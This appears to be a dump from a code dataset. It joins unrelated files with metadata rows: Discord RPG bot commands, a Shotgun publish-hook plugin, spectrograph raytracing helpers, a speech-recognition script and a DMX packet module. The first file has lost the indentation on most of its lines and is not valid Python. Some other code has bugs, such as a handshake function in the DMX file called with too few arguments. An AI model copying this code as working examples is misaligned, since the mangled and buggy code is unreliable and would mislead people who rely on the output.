@bot.command(name='recruit', aliases=["hire", "addparty"])
async def recruit(ctx, name):
    try:
        npc = npcs[name]
    except KeyError:
        await ctx.send("No NPC named " + name)
        return
    npcs.pop(name)
party[name] = npc
shared_functions.backup_characters()
await ctx.send(name + " added to party!")
@bot.command(name='fire', aliases=['retire', 'kick', 'ditch'])
async def leave(ctx, name):
try:
npc = party[name]
except KeyError:
await ctx.send("No party member named " + name)
return
party.pop(name)
npcs[name] = npc
await ctx.send(name + " removed from party!")
shared_functions.backup_characters()
@bot.command(name='wipeparty')
async def wipe_party(ctx):
    # Clear in place so the dict shared with shared_functions stays in sync.
    party.clear()
shared_functions.backup_party()
await ctx.send("Successfully killed entire party.")
@bot.command(name='retireparty', aliases=["giveup", "win"])
async def retire_party(ctx):
for name in list(party.keys()):
await leave(ctx, name)
await advance(ctx, 1)
await ctx.send("Entire party has been retired.")
@bot.command(name='inventorysize')
async def inventory_size(ctx, name, size):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
try:
int(size)
except ValueError:
await ctx.send("That is not a number you moron!")
return
length = len(party[name]["Inventory"])
if length > int(size):
party[name]["Inventory"] = party[name]["Inventory"][0:int(size)]
elif length < int(size):
for i in range(length, int(size)):
party[name]["Inventory"].append("Empty slot")
else:
await ctx.send("Character already has inventory of size " + size + ".")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='restart')
async def restart(ctx):
sys.exit()
@bot.command(name='go', aliases=['advance', 'nextworld'])
async def advance(ctx, reset=False):
# future support: track actual world map position, take a direction as argument
world["number"] += 1
world["modifier"] = 1 - int(((world["number"] + 1) / 2))
world["stat cap"] = world["number"] + 4
world["boss stat cap"] = world["number"] + 6
if reset:
world["number"] = 1
world["modifier"] = 1
world["stat cap"] = 5
world["boss stat cap"] = 7
shared_functions.backup_world(world)
await(ctx.send("World has been set to " + str(world["number"]) + " providing a boost of " + str(
world["modifier"]) + " to all rolls."))
@bot.command(name='randchar')
async def random_char(ctx, boss=False):
if boss:
stat_cap = world["boss stat cap"]
else:
stat_cap = world["stat cap"]
if world["number"] <= 0:
await ctx.send("Invalid world.")
return
global next_backstory
global next_short_name
global next_name
if next_backstory:
backstory = next_backstory
next_backstory = None
else:
backstory = random.choice(random_lists.Backstories)
if next_short_name:
first_name = next_short_name
next_short_name = None
else:
first_name = random.choice(names.Names)
while first_name in npcs.keys():
first_name = random.choice(names.Names)
if next_name:
full_name = next_name
next_name = None
else:
middle_name = None
if random.randint(1, 2) == 2:
middle_name = random.choice(names.Names)
last_name = random.choice(names.Names)
if middle_name:
full_name = first_name + " " + middle_name + " " + last_name
else:
full_name = first_name + " " + last_name
strongness = random.randint(0, stat_cap)
smartness = random.randint(0, stat_cap)
coolness = random.randint(0, stat_cap)
health = 2 * strongness + 1
gold = random.randint(0, stat_cap * 10)
blessing_level = None
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level I"
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level II"
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level III"
blessing_name = random.choice(random_lists.Blessings)
if blessing_level is None:
blessing = "No blessing"
else:
blessing = "**Blessing of " + blessing_name + "** " + blessing_level
trait1 = random.choice(list(traits.trait_dict.keys()))
trait2 = trait1
while trait2 == trait1:
trait2 = random.choice(list(traits.trait_dict.keys()))
color_string = shared_functions.random_color()
inventory = []
for i in range(0, 3):
if random.randint(1, 4) == 1:
inventory.append((await items.random_item(ctx, -2 * world["number"], 1, False)).name)
else:
inventory.append("Empty slot")
if boss:
backstory = random.choice(random_lists.BossBackstories)
trait1 = random.choice(list(traits.boss_trait_dict.keys()))
health *= (5 * world["number"])
gold *= (world["number"] * world["number"])
full_name = "*Boss:* " + full_name
secondary_trait_roll = random.randint(1, 20)
if secondary_trait_roll <= world["number"]:
            trait2 = random.choice(list(traits.boss_trait_dict.keys()))
            while trait1 == trait2:
                trait2 = random.choice(list(traits.boss_trait_dict.keys()))
character = {"Backstory": backstory, "Name": full_name, "Traits": [trait1, trait2], "Smartness": smartness,
"Coolness": coolness, "Strongness": strongness, "Health": health, "Gold": gold, "Color": color_string,
"Inventory": inventory, "Blessing": blessing}
npcs[first_name] = character
await ctx.send(embed=characters.print_character(first_name))
shared_functions.backup_characters()
@bot.command(name='randboss')
async def random_boss(ctx):
await random_char(ctx, True)
@bot.command(name='encounter')
async def encounter(ctx):
world_number = world["number"]
roll = random.randint(1, 99)
if roll > 66:
await randnpc(ctx)
elif roll < world_number + 1:
await random_boss(ctx)
else:
await random_char(ctx)
@bot.command(name="sell")
async def sell(ctx, character_name, item_name, show_price=False):
# TODO: Add support to attempt to sell an item to an NPC.
character = shared_functions.find_character(character_name)
if not character:
await ctx.send("No character named " + character_name)
return
if item_name not in items.item_dict.keys():
await ctx.send("No item named " + item_name)
return
if item_name not in character["Inventory"]:
await ctx.send(character_name + " does not have " + item_name + " in their inventory!")
return
item = items.item_dict[item_name]
if item.quality == 0:
price = 0
elif item.quality == 1:
price = 1
elif item.quality == 2:
price = 10
elif item.quality == 3:
price = 50
elif item.quality == 4:
price = 100
elif item.quality == 5:
price = 1000
if show_price:
await ctx.send("Selling this item will net you ", price, " gold.")
else:
character["Gold"] += price
await remove_item(ctx, character_name, item_name)
shared_functions.backup_characters()
# Selling to NPC: Good roll: NPC will buy for close to full price if they have enough gold, and tell you 'I can't
# afford that' otherwise. Bad roll: NPC will buy for low price close to store price. If NPC doesn't have enough
# gold still, they will offer all their gold.
@bot.event
async def on_message(message):
# Currently, if the bot is down, it will not check the channel history to see if it missed any inputs
# while it was down. This is not too hard to do (save the message ID of the latest read message in the JSON,
# then get history in this channel since that message and iterate through all missed messages on boot,
# disregarding all but the first from each user).
# If there is ever a need for message-by-message scanning, the wizard can be safely tucked into a function and left
# in wizards.py, with the actual event moved to main.
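    # A rough sketch of that catch-up idea (illustrative only, not wired up
    # here; `last_seen_id` is assumed to be persisted elsewhere and an
    # `import discord` would be needed for discord.Object):
    # async for missed in message.channel.history(after=discord.Object(id=last_seen_id),
    #                                             oldest_first=True):
    #     await wizard.wizard_main(missed)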
if message.channel.id == 714589518983987212 or message.channel.id == 714628821646835889:
await wizard.wizard_main(message)
await bot.process_commands(message)
bot.run(TOKEN)
| 33.948435 | 119 | 0.644895 | 2,392 | 18,434 | 4.867475 | 0.1551 | 0.038478 | 0.057717 | 0.025251 | 0.329468 | 0.24985 | 0.21455 | 0.144722 | 0.127115 | 0.104355 | 0 | 0.010823 | 0.243138 | 18,434 | 542 | 120 | 34.01107 | 0.823681 | 0.083216 | 0 | 0.324444 | 0 | 0 | 0.130169 | 0 | 0 | 0 | 0 | 0.001845 | 0 | 1 | 0 | false | 0.013333 | 0.033333 | 0 | 0.1 | 0.035556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226ffeed9557970bd6934e3d43f418e0b388671 | 7,274 | py | Python | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 4 | 2019-01-11T03:41:28.000Z | 2019-09-12T06:57:17.000Z | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | null | null | null | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 2 | 2019-01-10T05:00:18.000Z | 2020-02-15T16:32:56.000Z | # Copyright (c) 2017 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import os
import sgtk
HookBaseClass = sgtk.get_hook_baseclass()
class UpdateCutPlugin(HookBaseClass):
"""
Plugin for creating generic publishes in Shotgun
"""
def __init__(self, *args, **kwrds):
super(UpdateCutPlugin, self).__init__(*args, **kwrds)
self.publisher = self.parent
self.engine = self.publisher.engine
self.sg = self.engine.shotgun
@property
def icon(self):
"""
Path to an png icon on disk
"""
# look for icon one level up from this hook's folder in "icons" folder
return os.path.join(
self.disk_location,
os.pardir,
"icons",
"publish.png"
)
@property
def name(self):
"""
One line display name describing the plugin
"""
return "Update Cut Item"
@property
def description(self):
"""
Verbose, multi-line description of what the plugin does. This can
contain simple html for formatting.
"""
return "Update cut items in Shotgun for the given object"
@property
def settings(self):
"""
Dictionary defining the settings that this plugin expects to recieve
through the settings parameter in the accept, validate, publish and
finalize methods.
A dictionary on the following form:
{
"Settings Name": {
"type": "settings_type",
"default": "default_value",
"description": "One line description of the setting"
}
The type string should be one of the data types that toolkit accepts
as part of its environment configuration.
"""
return {}
@property
def item_filters(self):
"""
List of item types that this plugin is interested in.
Only items matching entries in this list will be presented to the
accept() method. Strings can contain glob patters such as *, for example
["maya.*", "file.maya"]
"""
return ["flame.batchOpenClip"]
def accept(self, settings, item):
"""
Method called by the publisher to determine if an item is of any
interest to this plugin. Only items matching the filters defined via the
item_filters property will be presented to this method.
A publish task will be generated for each item accepted here. Returns a
dictionary with the following booleans:
- accepted: Indicates if the plugin is interested in this value at
all. Required.
- enabled: If True, the plugin will be enabled in the UI, otherwise
it will be disabled. Optional, True by default.
- visible: If True, the plugin will be visible in the UI, otherwise
it will be hidden. Optional, True by default.
- checked: If True, the plugin will be checked in the UI, otherwise
it will be unchecked. Optional, True by default.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
:returns: dictionary with boolean keys accepted, required and enabled
"""
# Make sure that the Shotgun backend support Cuts
cut_supported = self.sg.server_caps.version >= (7, 0, 0)
# Only available on Shot context
shot_context = item.context.entity and item.context.entity.get("type") == "Shot"
accepted = cut_supported and shot_context and item.properties.get("fromBatch", False)
# If the context is correct, try to find the CutItem to Update
if accepted:
item.properties["CutItem"] = self.sg.find_one("CutItem", [["shot", "is", item.context.entity]],
["cut_order", "cut"], [
{"field_name": "cut.Cut.revision_number",
"direction": "desc"}])
# Accept only if we know what CutItem to update
accepted = item.properties["CutItem"] is not None
return {"accepted": accepted}
def validate(self, settings, item):
"""
Validates the given item to check that it is ok to publish.
Returns a boolean to indicate validity.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
:returns: True if item is valid, False otherwise.
"""
return True
def publish(self, settings, item):
"""
Executes the publish logic for the given item and settings.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
"""
asset_info = item.properties["assetInfo"]
path = item.properties["path"]
cut_item = item.properties["CutItem"]
version = item.properties.get("Version")
# If the current Publish session had created a Version, we push it to the CutItem to update
if version:
self.sg.update("CutItem", cut_item["id"], {"version": version})
# Build the thumbnail generation target list
targets = [cut_item]
# If the CutItem is the first one of the Cut, we update the Cut preview
if cut_item["cut_order"] == 1:
cut = cut_item["cut"]
targets.append(cut)
# For file sequences, the hooks we want the path as provided by flame.
path = item.properties.get("file_path", path)
# Create the Image thumbnail in background
self.engine.thumbnail_generator.generate(
display_name=item.name,
path=path,
dependencies=item.properties.get("backgroundJobId"),
target_entities=targets,
asset_info=asset_info
)
def finalize(self, settings, item):
"""
Execute the finalization pass. This pass executes once
all the publish tasks have completed, and can for example
be used to version up files.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
"""
self.engine.thumbnail_generator.finalize(path=item.properties["path"])
| 35.656863 | 107 | 0.609568 | 871 | 7,274 | 5.047072 | 0.30884 | 0.031847 | 0.014559 | 0.022748 | 0.19404 | 0.184941 | 0.17061 | 0.154231 | 0.134213 | 0.134213 | 0 | 0.001613 | 0.318257 | 7,274 | 203 | 108 | 35.832512 | 0.884856 | 0.535194 | 0 | 0.079365 | 0 | 0 | 0.105588 | 0.008345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15873 | false | 0 | 0.031746 | 0 | 0.31746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62287a7aba5381a1acde55098def7cb98cca56ed | 10,230 | py | Python | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# vim: set fileencoding=utf-8 ts=4 sts=4 sw=4 et tw=80 :
#
# Some useful routines to aid in vector raytracing. These are helpful when
# figuring out 3-D positioning of light rays through a spectrograph.
#
# Background information on the mathematics can be found at:
# https://en.wikipedia.org/wiki/Snell%27s_law#Vector_form
# https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
#
# Rob Siverd
# Created: 2019-02-18
# Last modified: 2019-03-29
#--------------------------------------------------------------------------
#**************************************************************************
#--------------------------------------------------------------------------
## Current version:
__version__ = "0.3.0"
## Python version-agnostic module reloading:
try:
reload # Python 2.7
except NameError:
try:
from importlib import reload # Python 3.4+
except ImportError:
from imp import reload # Python 3.0 - 3.3
## Modules:
import os
import sys
import copy
import time
import numpy as np
#from numpy.lib.recfunctions import append_fields
#import datetime as dt
#from dateutil import parser as dtp
#import scipy.linalg as sla
#import scipy.signal as ssig
#import scipy.ndimage as ndi
#import scipy.optimize as opti
#import scipy.interpolate as stp
#import scipy.spatial.distance as ssd
#from functools import partial
#from collections import OrderedDict
#import multiprocessing as mp
#np.set_printoptions(suppress=True, linewidth=160)
#import pandas as pd
#import statsmodels.api as sm
#import statsmodels.formula.api as smf
#from statsmodels.regression.quantile_regression import QuantReg
#import PIL.Image as pli
#import seaborn as sns
#import cmocean
#import theil_sen as ts
#import window_filter as wf
#import itertools as itt
##--------------------------------------------------------------------------##
## Reflection and refraction in 3 dimensions (vector forms):
def calc_surface_vectors(v_incident, surf_norm, n1_n2_ratio):
cti = -1.0 * np.dot(v_incident, surf_norm) # cos(theta_i)
nnr = n1_n2_ratio
v_reflect = v_incident + 2. * cti * surf_norm
smult = nnr*cti - np.sqrt(1.0 - nnr**2 * (1.0 - cti**2))
v_refract = nnr * v_incident + smult * surf_norm
return v_reflect, v_refract
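## Illustrative check (not part of the original module): at normal incidence on
## an air-to-glass interface (n1/n2 = 1/1.5) the reflected ray points straight
## back along the normal and the refracted ray continues undeviated.
## v_in = np.array([0., 0., -1.]); n_hat = np.array([0., 0., 1.])
## refl, refr = calc_surface_vectors(v_in, n_hat, 1.0 / 1.5)
## # refl -> [0., 0., 1.], refr -> [0., 0., -1.]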
def refracted_ray(v_incident, surf_norm, n1_n2_ratio):
cti = -1.0 * np.dot(v_incident, surf_norm) # cos(theta_i)
nnr = n1_n2_ratio
smult = nnr*cti - np.sqrt(1.0 - nnr**2 * (1.0 - cti**2))
v_refract = nnr * v_incident + smult * surf_norm
return v_refract
##--------------------------------------------------------------------------##
## Intersection of a line and plane. In this model, both lines and planes are
## described by (point, vector pairs). In the case of a line, the vector points
## "along" the line. For the plane, the vector is surface normal.
#def line_plane_intersection(line, plane):
#lpoint, lvector = line['point'], line['vector']
#ppoint, pvector = plane['point'], plane['vector']
#def line_plane_intersection(lpoint, lvector, ppoint, pnormal):
# """
# All inputs should be 3-element numpy ndarray type. The case of parallel
# line and plane should be handled ~correctly.
#
# lpoint - any point (x, y, z) on the line
# lvector - any vector (dx, dy, dz) along the line
# ppoint - any point (x, y, z) on the plane
# pnormal - any vector (dx, dy, dz) normal to plane surface
#
# Returns:
# intersection - (x, y, z) point of intersection
# """
#
# pl_sep = np.dot(ppoint - lpoint, pnormal)
# angsep = np.dot(lvector, pnormal)
# # Parallel line/plane is handled separately:
# if (angsep == 0.0):
# sys.stderr.write("WARNING: line and plane are PARALLEL!\n")
# if (pl_sep == 0.0):
# sys.stderr.write("Line lies within plane!\n")
# return lpoint
# #return (0.0, lpoint)
# else:
# sys.stderr.write("Line and plane do not intersect!\n")
# return None
# #return None, None
# # If not parallel, get distance and intersection:
# distance = pl_sep / angsep
# return lpoint + distance * lvector
# #isect = lpoint + distance * lvector
# #truedist = np.sqrt(np.sum((isect - lpoint)**2))
# #sys.stderr.write("truedist: %10.5f\n" % truedist)
# #return distance, isect
##--------------------------------------------------------------------------##
## Point-in-polygon test routine. This will be useful to check whether a
## calculated line-plane intersection point resides within the boundaries of
## a face as defined by its vertices.
#def point_in_polygon(point, vtx_list):
# return
##--------------------------------------------------------------------------##
##------------------ Grating Diffraction ----------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##------------------ End-to-end Spectrograph Raytrace ----------------##
##--------------------------------------------------------------------------##
class E2ERT(object):
def __init__(self, prism, grating, ccd, vlevel=1):
#self._faces = [x for x in face_list]
#self._faces = copy.deepcopy(face_list)
self._probj = prism
self._grobj = grating
self._cmobj = ccd
self._prf1 = self._probj.get_face('face1')
self._prf2 = self._probj.get_face('face2')
# Feedback messaging:
self._stream = sys.stderr
self._vlevel = vlevel
return
def _vlwrite(self, vlmin, msgtxt):
if self._vlevel >= vlmin:
self._stream.write(msgtxt)
return
def follow(self, xyz0, traj0, wl_um, spec_order):
# collect useful pieces:
prf1 = self._probj.get_face('face1')
prf2 = self._probj.get_face('face2')
p_n1n2 = self._probj._n1n2_ratio(wl_um) # n_glass / n_air
grbot = self._grobj.get_face('bot')
sensor = self._cmobj.get_face('front')
result = {'complete':False, 'ccdxy':None, 'path':[(xyz0, traj0)],
'wlen_um':wl_um, 'specmod':None}
#light_path = [(xyz0, traj0)]
# -------------------------------------------------------
# Enter prism through face1 (point + trajectory):
valid, f1_isect = prf1.get_intersection(xyz0, traj0)
if not valid:
self._vlwrite(1, "Input beam missed prism!\n")
return result
#return light_path
new_traj = calc_surface_vectors(traj0, prf1['normal'], p_n1n2)[1]
#light_path.append((f1_isect, new_traj))
result['path'].append((f1_isect, new_traj))
# Exit through prism face2 (point + trajectory):
valid, f2_isect = prf2.get_intersection(f1_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam failed to exit prism through face2!\n")
return result
#return light_path
new_traj = calc_surface_vectors(new_traj,
-prf2['normal'], 1. / p_n1n2)[1]
#light_path.append((f2_isect, new_traj))
result['path'].append((f2_isect, new_traj))
# -------------------------------------------------------
# Intersect grating and change direction (diffract):
hits_grating, gr_isect = grbot.get_intersection(f2_isect, new_traj)
        if not hits_grating:
self._vlwrite(1, "Light ray misses grating!\n")
return result
#return light_path
valid, diffr_vec = \
self._grobj.diffracted_ray(new_traj, wl_um, spec_order)
if not valid:
#light_path.append((gr_isect, None))
result['path'].append((gr_isect, None))
self._vlwrite(1, "No valid diffracted beam from grating!\n")
return result
#return light_path
result['path'].append((gr_isect, diffr_vec))
#light_path.append((gr_isect, diffr_vec))
# -------------------------------------------------------
# Re-enter prism through face2 (point + trajectory):
hits_prism, f2_isect = prf2.get_intersection(gr_isect, diffr_vec)
if not hits_prism:
self._vlwrite(1, "Diffracted ray does not return to prism!\n")
return result
#return light_path
new_traj = calc_surface_vectors(diffr_vec, prf2['normal'], p_n1n2)[1]
result['path'].append((f2_isect, new_traj))
#light_path.append((f2_isect, new_traj))
# Exit through prism face1 (point + trajectory):
valid, f1_isect = prf1.get_intersection(f2_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam failed to exit prism through face1!\n")
return result
#return light_path
new_traj = calc_surface_vectors(new_traj,
-prf1['normal'], 1. / p_n1n2)[1]
result['path'].append((f1_isect, new_traj))
#light_path.append((f1_isect, new_traj))
# -------------------------------------------------------
# Check for intersection with CCD plane:
valid, cam_isect = sensor.get_intersection(f1_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam misses CCD sensor!\n")
#return light_path
return result
#sys.stderr.write("cam_isect: %s\n" % str(cam_isect))
result['path'].append((cam_isect, None))
result['ccdxy'] = sensor._xyz2uv_s(cam_isect)
result['complete'] = True
result['specmod'] = [wl_um] + result['ccdxy'].tolist()
#result['summary'] = [wl_um] +
#light_path.append((cam_isect, None))
#light_path.append((cam_isect, native_isect))
#sys.stderr.write("dir(sensor): %s\n" % str(dir(sensor)))
return result
#return light_path
######################################################################
# CHANGELOG (raytrace_tools.py):
#---------------------------------------------------------------------
#
# 2019-02-18:
# -- Increased __version__ to 0.1.0.
# -- First created raytrace_tools.py.
#
| 39.960938 | 79 | 0.559042 | 1,230 | 10,230 | 4.479675 | 0.282114 | 0.024138 | 0.026134 | 0.02922 | 0.319601 | 0.261162 | 0.219782 | 0.158439 | 0.158439 | 0.14265 | 0 | 0.021054 | 0.224633 | 10,230 | 255 | 80 | 40.117647 | 0.673601 | 0.538612 | 0 | 0.340426 | 0 | 0 | 0.086323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053191 | false | 0 | 0.085106 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62288422254e8b5f4d472cc0028e1fa65576d9c6 | 1,431 | py | Python | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | 1 | 2016-12-05T01:29:52.000Z | 2016-12-05T01:29:52.000Z | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | null | null | null | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | 1 | 2020-04-24T17:26:59.000Z | 2020-04-24T17:26:59.000Z | import sys
import speech_recognition as sr
from os import environ, path,getcwd
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
#with open('microphone-results.raw', 'wb') as f:
# f.write(audio.get_raw_data())
with open("microphone-results.wav", "wb") as f:
f.write(audio.get_wav_data())
DIR=getcwd()
#input(DIR)
config = Decoder.default_config()
config.set_string('-hmm', path.join(DIR, r'pocketsphinx-python\pocketsphinx\model\en-us'))
#config.set_string('-lm', path.join(DIR, 'pocketsphinx-python\pocketsphinx\model\en-us.lm.bin'))
#config.set_string('-dict', path.join(DIR, 'pocketsphinx-python\pocketsphinx\model\cmudict-en-us.dict'))
#config.set_string('-lm', path.join(DIR, 'LanguageModel\1945.lm'))
#input(path.join(DIR, 'LanguageModel\lm1945.dict'))
lm=path.join(DIR, 'model.bin')
d=path.join(DIR, '2859.dic')
#input(lm)
#input(d)
config.set_string('-lm',lm)
config.set_string('-dict',d)
config.set_string('-logfn','nul')
decoder = Decoder(config)
decoder.start_utt()
stream = open(path.join(DIR, 'microphone-results.wav'), 'rb')
while True:
buf = stream.read(1024)
if buf:
decoder.process_raw(buf, False, False)
else:
break
decoder.end_utt()
#print(list(decoder.seg()))
print ('Best hypothesis segments: ', [seg.word for seg in decoder.seg()])
| 30.446809 | 104 | 0.733054 | 217 | 1,431 | 4.760369 | 0.37788 | 0.061955 | 0.085189 | 0.066796 | 0.221684 | 0.221684 | 0.221684 | 0.096805 | 0.096805 | 0 | 0 | 0.01227 | 0.088749 | 1,431 | 46 | 105 | 31.108696 | 0.779908 | 0.331936 | 0 | 0 | 0 | 0 | 0.180085 | 0.09322 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62292ac12d3d2f7e1949d92468b7d3d21b1fa86b | 4,980 | py | Python | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from enum import IntEnum
import struct
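# Single-bit masks for the header flags of the dmx2serial packet format.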
class Flag(IntEnum):
Payload = 0b10000000
Success = 0b01000000
Resend = 0b00100000
Configurate = 0b00000100
Hello = 0b00000010
Parity = 0b00000001
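# Thin wrapper around the flags bitfield with set/unset/toggle/isSet helpers.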
class FlagSet(object):
def __init__(self, flags=0x00):
flags = int(flags)
if flags < 0 or flags > 255:
raise ValueError("Invalid flags.")
self.flags = flags
def __str__(self):
return "{}({})".format(self.__class__.__name__, ",".join(['%s=%s' % (k, v) for (k, v) in self.asDict().items()]))
def asDict(self):
res = {}
for f in Flag:
if self.isSet(f):
res[f.name] = 1
else:
res[f.name] = 0
return res
def getBitfield(self):
return self.flags
def set(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags |= flag
def unset(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags &= ~flag
def toggle(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags ^= flag
def isSet(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
		return ((self.flags & flag) != 0)
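# A single protocol packet: version byte, flags byte and, for payload packets, universe, channel and value (serialized little-endian).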
class Packet(object):
checksum = 0x0
def __init__(self, version=0x00, flags=0x00, universe=0x00, channel=0x0000, value=0x00):
self.setVersion(version)
self.flags = FlagSet(flags)
self.setUniverse(universe)
self.setChannel(channel)
self.setValue(value)
def __str__(self):
return "{}(version={},flags={},universe={},channel={},value={},checksum={})".format(self.__class__.__name__, self.version, str(self.flags), self.universe, self.channel, self.value, self.checksum)
def getVersion(self): return self.version
def getFlags(self): return self.flags
def getUniverse(self): return self.universe
def getChannel(self): return self.channel
def getValue(self): return self.value
def setVersion(self, version):
version = int(version)
if version < 0 or version > 255:
raise ValueError("Invalid version.")
self.version = version
def setUniverse(self, universe):
universe = int(universe)
if universe < 0 or universe > 255:
raise ValueError("Invalid universe.")
self.universe = universe
def setChannel(self, channel):
channel = int(channel)
if channel < 0 or channel > 65535:
raise ValueError("Invalid channel.")
self.channel = channel
def setValue(self, value):
value = int(value)
if value < 0 or value > 255:
raise ValueError("Invalid value.")
self.value = value
def calculateParity(self):
self.flags.unset(Flag.Parity)
odd = (bin(self.version).count("1") + bin(self.flags.getBitfield()).count("1")) % 2
		if odd == 1:
self.flags.set(Flag.Parity)
def checkParity(self):
odd = (bin(self.version).count("1") + bin(self.flags.getBitfield()).count("1")) % 2
		return (odd == 0)
def calculateChecksum(self):
pass #TODO#
def checkChecksum(self):
pass #TODO#
def serialize(self):
if self.flags.isSet(Flag.Payload):
return struct.pack(
"<BBBHB",
self.version,
self.flags.getBitfield(),
self.universe,
self.channel,
self.value
)
else:
return struct.pack(
"<BB",
self.version,
self.flags.getBitfield()
)
def deserialize(self, data):
pass #TODO#
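# Convenience constructors for the handshake, channel-set and configuration packets.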
class PacketFactory(object):
@staticmethod
def createHsAsk():
return Packet(flags=(Flag.Hello | Flag.Parity))
@staticmethod
def createHsAnswer(success, resend):
p = Packet(version=1, flags=Flag.Hello)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
@staticmethod
def createChSet(universe, channel, value):
p = Packet(version=1, flags=Flag.Payload, universe=universe, channel=channel, value=value)
p.calculateChecksum()
return p
@staticmethod
def createChAnswer(success, resend):
p = Packet(version=1)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
@staticmethod
def createCfgAnswer(success, resend):
p = Packet(version=1, flags=Flag.Configurate)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
if __name__ == "__main__":
#p = Packet(version=1, flags=(Flag.Payload | Flag.Hello))
#print(p)
#print(p.checkParity())
#p.calculateParity()
#print(p)
#print(p.checkParity())
print(" HsAsk():", PacketFactory.createHsAsk())
print(" HsAnswer(1):", PacketFactory.createHsAnswer(True))
print(" HsAnswer(0):", PacketFactory.createHsAnswer(False))
print(" ChSet(...):", PacketFactory.createChSet(7, 10, 255))
